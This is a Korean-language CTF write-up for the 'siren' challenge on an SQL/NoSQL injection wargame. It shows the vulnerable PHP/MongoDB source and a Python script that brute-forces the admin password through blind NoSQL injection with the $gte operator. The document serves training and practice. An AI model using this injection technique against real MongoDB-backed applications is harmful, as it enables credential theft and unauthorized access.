siren-writeup

<?php
  include "./config.php";
  login_chk();
  $db = mongodb_connect();
  $query = array(
    "id" => $_GET['id'],
    "pw" => $_GET['pw']
  );
  echo "<hr>query : <strong>".json_encode($query)."</strong><hr><br>";
  $result = mongodb_fetch_array($db->prob_siren->find($query));
  if($result['id']) echo "<h2>Hello User</h2>";

  $query = array("id" => "admin");
  $result = mongodb_fetch_array($db->prob_siren->find($query));
  if($result['pw'] === $_GET['pw']) solve("siren");
  highlight_file(__FILE__);
?>

 

보아하니 bsi다..

몽고디비에서 어떻게 할까하며 저번 문제에서 본 블로그를 보는데 여러 조건식이 보였다!

$gte 가 >=라는 것을 보고 이걸 사용해서 풀면 되겠다! 하며 CLEAR!!!  

 

import re
import requests
import time

test='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
flag = ''
length= 0
session =dict(PHPSESSID="자신의 PHPSESSID")
for i in range (1,20):
        for j in test:
                        r=requests.post("https://los.rubiya.kr/chall/siren_9e402fc1bc38574071d8369c2c3819ba.php?id=admin&pw[$gte]="+flag+j,cookies=session)
                        if 'Hello User' not in r.text:
                                if j.isdigit():
                                        flag=flag+str(int(j)-1)
                                        print("finding pw: "+flag)
                                        break
                                else:
                                        flag=flag+chr(ord(j)-0x01)
                                        print("finding pw: "+flag)
                                        break
print("pw "+flag)


            

스크립트를 짜다가 ord 함수를 까먹어서 삽질을 했다...